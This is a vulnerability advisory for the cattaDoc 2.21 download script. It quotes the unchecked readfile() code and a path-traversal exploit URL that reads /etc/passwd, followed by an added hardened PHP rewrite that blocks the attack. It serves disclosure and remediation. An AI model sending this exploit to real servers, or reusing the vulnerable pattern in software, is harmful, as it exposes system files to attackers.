# cattaDoc 2.21 (download2.php fn1) Remote File Disclosure Vulnerability
# D.Script: http://cattadoc.com/download/cattadoc-2.21.tgz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code:
##############################################################
# $tp = $_REQUEST['mtp'];                                    #
# $ofn = '"'.$_REQUEST['fn2'].'"';                           #
# header("Content-type: $tp");                               #
# header("Content-Disposition: attachment; filename=$ofn");  #
# readfile($_REQUEST['fn1']); <<----                         #
##############################################################
# Exploit:[Path_cattaDoc]/download2.php?fn1=../../../../../../etc/passwd

# milw0rm.com [2007-04-06]
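
A hardened counterpart to the V.Code lines above, added here as an example; it is not code from cattaDoc or from the advisory's author. The storage directory DOWNLOAD_ROOT and the function names resolve_download, safe_filename and send_download are assumptions made for illustration.

```php
<?php
// Added example: confines fn1 to one directory before readfile() is reached.
// DOWNLOAD_ROOT and all function names are hypothetical, not cattaDoc code.
const DOWNLOAD_ROOT = '/var/www/cattadoc/files';

// Resolve a client-supplied name to a real file under $root, or return null.
function resolve_download(string $root, string $requested): ?string
{
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($root);
    // realpath() collapses ../ and follows symlinks; false if nothing is there.
    $path = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // Trailing separator so /files_old is not accepted as being under /files.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Reduce the client-supplied display name (fn2) to a conservative character set.
function safe_filename(string $name): string
{
    $name = (string)preg_replace('/[^A-Za-z0-9._-]/', '_', basename($name));
    return ($name === '' || $name[0] === '.') ? 'download' : $name;
}

function send_download(array $req): void
{
    $fn1  = is_string($req['fn1'] ?? null) ? $req['fn1'] : '';
    $path = resolve_download(DOWNLOAD_ROOT, $fn1);
    if ($path === null) {
        http_response_code(404);   // same answer for "missing" and "outside root"
        return;
    }
    $fn2 = is_string($req['fn2'] ?? null) ? $req['fn2'] : basename($path);
    // Fixed type instead of copying the mtp parameter into the response header.
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="'
        . safe_filename($fn2) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

send_download($_REQUEST);
```

With this check, a request carrying the advisory's fn1 value resolves outside DOWNLOAD_ROOT and receives a 404 instead of the file contents.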